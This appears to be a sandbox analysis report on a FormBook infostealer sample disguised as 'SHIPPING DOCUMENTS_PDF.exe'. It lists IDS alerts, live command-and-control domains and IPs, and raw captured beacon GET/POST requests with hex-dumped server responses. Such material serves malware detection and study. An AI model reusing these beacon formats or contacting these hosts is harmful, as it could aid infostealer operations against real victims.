Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49873 -> 124.71.162.21:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 3.125.36.175:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 38.6.78.235:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 101.32.205.61:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 209.74.79.42:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 172.67.176.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 172.67.176.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 172.67.176.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 45.41.80.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 101.32.205.61:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49889 -> 150.109.11.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49974 -> 209.74.79.42:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 38.6.78.235:80
Source: DNS query: www.070001813.xyz
Source: DNS query: www.growbamboo.xyz
Source: Joe Sandbox View | IP Address: 161.97.142.144
Source: Joe Sandbox View | IP Address: 172.67.176.240
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: CONTABODE
Source: Joe Sandbox View | ASN Name: WIIUS
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (17 occurrences)
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BC22EE: InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | HTTP traffic detected:
  GET /5cm4/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA== HTTP/1.1
  Host: www.emirates-visa.net
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /gn0y/?LDVlCz=deG7RjeXnjjKJ6Ot/ZvT1ZCOdrvHxkgph9CMZ5BhYMmF8u0wO9qMaDcK53O3JwyOf3l+Oc7MzAVt2qPkHXgf7ZhvCL0D4R10rxSbaYIqOAV7xlWd89x6BKiu35RrP0Id3g==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
  Host: www.070001813.xyz
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /f95q/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=kbZ+3TVQWfE7KiBcybfm9WvlwV1TJfIMHZM6kD8OpyCP9Gh7sWOPFpouLIgiGz3sUBqRfaXNkxnyQnhTpFi/D08FMGsEDjNddsm/ASVO0JLXKussNUmxA8HGD8mS8NlSug== HTTP/1.1
  Host: www.activateya.life
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /qei1/?LDVlCz=nNC+GBX2ggWuM05tEEqRTuHIkAvcf+dXy/bvByniPoLRj52NglzWV1Nft7BNtL9++4tRfUwg9XmNi4A2kp9kOCOyWvDUT5wtJii7I2tTBBgakefdRMv39WDJ4M987EpnCg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
  Host: www.walkecode.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /gejp/?LDVlCz=B8lENIMSkdQf4FGQc5K+k257k877TXD8FgVAfBzrbl9XXLWxyw5ahRnSZIhzPxA1TMan6vpZ6mPmpcnGRYODwaH5MOJowBwrmH/nBLcALJg/EQzrJ0QQeK+YBPbGWQ4zHw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
  Host: www.ciemanr.quest
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /1h7d/?LDVlCz=GhVUl+BMvYJ5ZB/G+p82cySXkvn+9vYw5d6SxNhFTeZQzODCqlJRcn8j1xBkKA1XTq1Cn2kO8HKqHDF15Seo3gBfn1d442lRHkqyo3MG/ycD+W3sgPB+1QYdeAS4c5YMDQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
  Host: www.growbamboo.xyz
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /icu6/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=762QZ2SV6NpjcpWEPp/HDXxWZXZX1W4w6TtwEwMqgABTEXEh+wW122QWjov6SciVl+aW6WWJfJ+5Cw+tTwbMJ19RlEhii/WIAwuvAuC5wag6L1em5+IXdi875fnKjGjeWw== HTTP/1.1
  Host: www.primespot.live
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
  Host: www.hisako.shop
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n0se/?LDVlCz=hkrsNdm9A7NEs6AELC9hc5Biy4ux3a/2UN9Ti/zPtL1d4UFJsQdYSGmB1x8mN1/no5/doAmWeXNISuQ7Z6M7ARUekuecQYjdGGqJoetNg5rktHF3zD1BwWzApk9VpjBEpg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.rwse6wjx.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9lgl/?LDVlCz=NTK3NLhlAEJIOtoeBFtljOkEhfYZVbBGiOzAI1f+R144iBEE4BOnuC3DqsUysY3FH9LbQrV9xfPYm9YM/jyzxs8eKdKq7NnxOPLJXW8Qu/cpUMw46FhSxTz+BHey1p9/Wg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.17jkgl.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /laeb/?LDVlCz=R1QkcJ3G5DA9kU07Q4bHZGXwpE7poG4obEoFTYXYr0KTY8cjuufgj2Wfg7CEtb/if9/3otTPHXcvO0KabB4WT9d0qR/eTQNYs+qdxysYlPDjIZ08l2KjBlYrb7eSynDgaw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.thezensive.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /26nq/?LDVlCz=03R0/PY94GJRzPoOKSenb2h5QS/Kl50E/qK0YcgrJ8wpZCLSP+GtGIEwrkK3Oa2ONw/TguZq9BdWMDmUOrZ+COkHC5rjPuI42FsUNzu6Vv93haoOa+yyAoKItnrc6cGBtQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.zrichiod-riech.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.emirates-visa.net
                Source: global trafficDNS traffic detected: DNS query: www.070001813.xyz
                Source: global trafficDNS traffic detected: DNS query: www.activateya.life
                Source: global trafficDNS traffic detected: DNS query: www.walkecode.top
                Source: global trafficDNS traffic detected: DNS query: www.ciemanr.quest
                Source: global trafficDNS traffic detected: DNS query: www.growbamboo.xyz
                Source: global trafficDNS traffic detected: DNS query: www.primespot.live
                Source: global trafficDNS traffic detected: DNS query: www.hisako.shop
                Source: global trafficDNS traffic detected: DNS query: www.rwse6wjx.sbs
                Source: global trafficDNS traffic detected: DNS query: www.17jkgl.com
                Source: global trafficDNS traffic detected: DNS query: www.thezensive.work
                Source: global trafficDNS traffic detected: DNS query: www.zrichiod-riech.sbs
                Source: global trafficDNS traffic detected: DNS query: www.wtsshnm.top
                Source: unknownHTTP traffic detected: POST /gn0y/ HTTP/1.1Host: www.070001813.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.070001813.xyzReferer: http://www.070001813.xyz/gn0y/Content-Length: 207Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36Data Raw: 4c 44 56 6c 43 7a 3d 51 63 75 62 53 55 61 30 76 6a 7a 6f 4d 2f 72 42 32 2b 6a 31 77 62 58 4d 61 34 32 4d 2f 6a 51 6e 32 61 6d 72 62 49 74 43 62 4e 71 67 39 4f 70 53 66 59 4b 71 50 46 59 46 31 43 2b 77 47 6d 69 6f 4d 30 6f 46 55 38 66 63 6f 7a 56 39 30 5a 58 6c 51 48 64 6e 77 2f 56 62 41 36 46 6c 72 42 77 46 68 41 44 64 66 34 34 56 55 43 42 42 68 31 69 33 35 76 70 31 45 35 47 59 35 49 74 4b 4e 6c 46 77 30 74 6a 36 49 75 39 77 44 55 62 6f 6a 54 72 4e 6e 38 62 51 6b 43 58 36 59 4e 73 70 49 65 4c 61 41 45 58 67 61 54 6a 64 4e 55 7a 75 50 50 51 54 43 4f 4d 68 64 78 75 77 48 44 68 52 42 54 48 57 37 4e 36 65 35 55 63 3d Data Ascii: LDVlCz=QcubSUa0vjzoM/rB2+j1wbXMa42M/jQn2amrbItCbNqg9OpSfYKqPFYF1C+wGmioM0oFU8fcozV90ZXlQHdnw/VbA6FlrBwFhADdf44VUCBBh1i35vp1E5GY5ItKNlFw0tj6Iu9wDUbojTrNn8bQkCX6YNspIeLaAEXgaTjdNUzuPPQTCOMhdxuwHDhRBTHW7N6e5Uc=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:18:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:18:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 
3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:19 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 